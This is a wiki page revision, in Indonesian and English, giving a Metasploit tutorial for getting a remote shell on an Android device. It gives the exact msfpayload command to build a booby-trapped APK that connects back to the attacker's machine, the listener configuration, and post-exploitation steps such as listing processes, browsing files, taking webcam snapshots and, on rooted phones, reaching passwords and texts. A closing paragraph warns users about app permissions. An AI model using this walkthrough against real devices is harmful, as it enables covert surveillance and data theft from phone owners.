Difference between revisions of "MSF: Dapatkan remote shell android"

From OnnoWiki
Jump to navigation Jump to search
Line 16: Line 16:
 
==Di sisi Kali Linux==
 
==Di sisi Kali Linux==
  
 +
Di CLI, ketik
  
 +
msfconsole
  
4. In Kali, start Metasploit from the menu or by typing “msfconsole” in a Terminal window.
+
Jalankan perintah
 
 
5. Once Metasploit starts, type in the following to create a listener:
 
  
 
  user exploit/multi/handler
 
  user exploit/multi/handler
Line 77: Line 77:
  
 
Pretty amazing stuff!
 
Pretty amazing stuff!
 
 
 
 
 
 
 
  
 
==Referensi==
 
==Referensi==
  
 
* http://www.infosecisland.com/blogview/23632-Getting-a-Remote-Shell-on-an-Android-Device-using-Metasploit.html
 
* http://www.infosecisland.com/blogview/23632-Getting-a-Remote-Shell-on-an-Android-Device-using-Metasploit.html

Revision as of 15:34, 29 May 2017

sumber: http://www.infosecisland.com/blogview/23632-Getting-a-Remote-Shell-on-an-Android-Device-using-Metasploit.html

Membuat booby trapped APK file

Buat APK dengan kemampuan remote shell. Gunakan perintah msfpayload. Di Kali Linux, lakukan

sudo msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.16 LPORT=4444 R > app.apk

Masukan IP address Kali Linux & Port-nya.

Setelah perintah di atas di jalankan, maka akan dibuat file app.apk.

Copy / kirim file app.apk di Android device. Install apk tersebut, akan ada warning ke user bahwa "apk tersebut dari unknown source".


Di sisi Kali Linux

Di CLI, ketik

msfconsole

Jalankan perintah

user exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.1.16 (enter your Kali IP address)
set lport 4444

Then just type exploit to start the handler:

exploit1

6. Run the App on your Android device. It should show up as a big “M” icon with a name something like “Main Activity”.

7. A big button will appear on your phone that says, “ReverseTcp”, when it is pressed, your phone will connect out to the Metasploit system and a remote shell session is created.

On your Metaploit system you should see this:

Reverse TCP session

An active session is created and it drops you automatically into a meterpreter prompt.

8. From here your can type “sysinfo” to get information on the device:

sysinfo

9. You can see the processes running by typing, “ps”:

PS command

You can surf the Android device remotely by using standard Linux commands like ls, pwd, and cd. The Download directory usually has interesting things in it.

Though it errored out on mine, you can type “webcam_list” to get a list of the phone’s web cams, then “webcam_snap” to take a snapshot from the webcam.

Typing “help” at a meterpreter prompt will list all the command that are available.

We can also run the shell command that will drop us into a direct Terminal shell if we want:

meterpreter > shell
Process 1 created.
Channel 1 created.
ls

The Android phone in this example was not rooted, so I could not access the stored passwords, texts or phone logs.

But if the phone was rooted, I should have been able to access them… Remotely…

This should be noted by people who have rooted their phone!

And that is it! One wrong app installed by a user and an attacker could get remote access to your phone or other Android device. Did I mention that the phone was running an Anti-Virus program from a major vendor? It had no problems with letting my remote shell run…

Pay special attention to the rights and capabilities that an app wants when installing new apps. If a game wants full access to your phone, including the ability to make pay phone calls, this should be a red flag.

What’s next with Android support on Meterpreter?

Well, it is not “officially” supported yet, but there is an extension available to Meterpreter that allows several new Android based commands:

Pretty amazing stuff!

Referensi